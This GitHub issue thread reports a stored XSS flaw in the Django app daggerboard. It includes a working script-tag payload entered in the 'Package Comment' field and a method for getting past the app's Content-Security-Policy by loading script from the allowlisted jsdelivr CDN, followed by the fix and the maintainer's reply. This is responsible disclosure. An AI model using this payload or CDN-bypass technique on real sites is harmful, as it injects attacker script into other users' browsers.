search

nyph-infosec / daggerboard

MIT License
100 stars 19 forks source link

XSS Vulnerability #10

Closed devhsoj closed 2 years ago

devhsoj commented 2 years ago

Upon installing & using daggerboard (which is an awesome app by the way), I came across a XSS / sanitization vulnerability I'd like to share.

In the form for adding a package to an SBOM at /admin/daggerboard/package/add/ there seems to be no form sanitization, which allowed me to input HTML.

Now this really isn't that big of a deal for django apps that deal with user input, since django will automatically sanitize data as you render it in a view / template.

However, in the template sbomscorecard.html, lines 240 - 243, the safe django template filter is in use, which tells django that the data is 'safe' to render as HTML (which honestly doesn't make any sense), allowing any user to render any HTML that they inputted into that form, on the individual SBOM views at /sbomscorecard/.

Now if you try to add an inline script tag into the input on the 'Add Package' form and visit /sbomscorecard/, it won't work due to the well put together Content-Security-Policy blocking inline scripts.

However, in the Content-Security-Policy set in place, cdn.jsdelivr.net is allowed, and jsdelivr allows you to use their services to act as a CDN for your GitHub assets (Article), which allows us to input a script tag with a source similar to https://cdn.jsdelivr.net/gh/{username}/{repo}/ which allows us to inject our javascript straight into the view at /sbomscorecard/.

Example test.js:

<script src="https://cdn.jsdelivr.net/gh/devhsoj/testing/test.js"></script>

Inputting the above text into the 'Add Package' form in the 'Package Comment' field under any SBOM, then visiting /sbomscorecard/ and visiting that same SBOM's page, will execute that test javascript which will create and display an alert with the text 'foo'.

Fixes

The fix is as simple as removing the use of the safe template filter (|safe) in the templates sbomscorecard.html, vendorscorecard.html, and change_form.html, which will disable the data being rendered as HTML.

namtarb commented 2 years ago

Aha excellent find and the detailed description is much appreciated. We will fix this (see #9) and plan to add a new v1.0.1 release.

devhsoj commented 2 years ago

Awesome, thanks! Glad to be of help.